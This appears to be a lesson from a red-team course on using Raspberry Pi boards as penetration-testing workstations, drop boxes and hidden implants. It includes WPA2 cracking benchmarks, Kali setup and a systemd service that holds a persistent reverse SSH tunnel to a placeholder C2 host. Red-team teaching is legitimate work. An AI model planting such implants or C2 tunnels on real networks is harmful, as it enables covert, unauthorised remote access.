Pick a depth. Each prompt opens in your AI pre-loaded with the lesson. Click a row to preview the prompt.
The Pi family is the default hardware base for offensive operators because the form factor maps to the use-case: Pi 5 (8 GB) as a portable workstation, Pi 4B as a drop box, Pi Zero 2 W as an implant. All three run full Kali. The trade is power vs stealth: Pi 5 cracks WPA2 fast; Pi Zero 2 W lives undiscovered on USB power.
Loadout by role. Field workstation: Pi 5 + 8GB + NVMe HAT + USB-C 27W PD + touchscreen. Drop box: Pi 4B + PoE HAT + 64GB SSD. Implant: Pi Zero 2 W + USB pass-through hidden inside a phone charger.
uname -m returns aarch64.hashcat -b -m 22000. Compare to your laptop. Heavy crypto stays on the workstation.ssh -o PreferredAuthentications=password root@pi rejects.xzcat kali-linux-2026.1-raspberry-pi-arm64.img.xz | sudo dd of=/dev/sdX bs=4M status=progress
echo 'PermitRootLogin prohibit-password' | sudo tee -a /etc/ssh/sshd_config
echo 'PasswordAuthentication no' | sudo tee -a /etc/ssh/sshd_config
sudo tee /etc/systemd/system/c2-tunnel.service <<'EOF'
[Unit]
Description=C2 reverse SSH tunnel
After=network-online.target
[Service]
ExecStart=/usr/bin/autossh -M 0 -N -o ServerAliveInterval=30 -R 0.0.0.0:2222:localhost:22 ops@c2.example.com
Restart=always
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl enable --now c2-tunnel